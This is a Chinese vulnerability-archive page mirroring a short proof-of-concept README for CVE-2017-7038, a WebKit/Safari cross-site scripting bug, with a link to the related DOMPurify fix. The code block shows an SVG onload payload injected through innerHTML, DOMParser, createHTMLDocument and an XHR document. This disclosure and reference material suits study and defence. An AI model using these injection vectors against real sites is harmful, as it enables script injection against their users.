目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2017-7038 PoC — 多款Apple产品WebKit 跨站脚本漏洞

来源
关联漏洞
标题: 多款Apple产品WebKit 跨站脚本漏洞 (CVE-2017-7038)
Description:Apple iOS、Safari和tvOS都是美国苹果(Apple)公司的产品。Apple iOS是为移动设备所开发的一套操作系统;Safari是一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器;tvOS是一套智能电视操作系统。WebKit是KDE社区开发的一套开源Web浏览器引擎,目前被Apple Safari及Google Chrome等浏览器使用。 多款Apple产品中的WebKit组件存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。以下产品和版本受到影响
Description
Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923
介绍
# CVE-2017-7038
Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923

**Document implementation XSS vulnerability**

```
var payload = '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>';

document.createElement('body').innerHTML = payload;

document.implementation.createHTMLDocument().write(payload);

new DOMParser().parseFromString(payload, 'text/html');

var xhr = new XMLHttpRequest;
xhr.responseType='document'
xhr.open('GET', 'data:text/html,', false);
xhr.send(null);
xhr.response.body.innerHTML=payload;
```

Authors: [@ansjdnakjdnajkd](https://twitter.com/ansjdnakjdnajkd) and [@ShikariSenpai](https://twitter.com/ShikariSenpai)

Thanks and fix also at https://github.com/cure53/DOMPurify/releases/tag/0.8.7
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →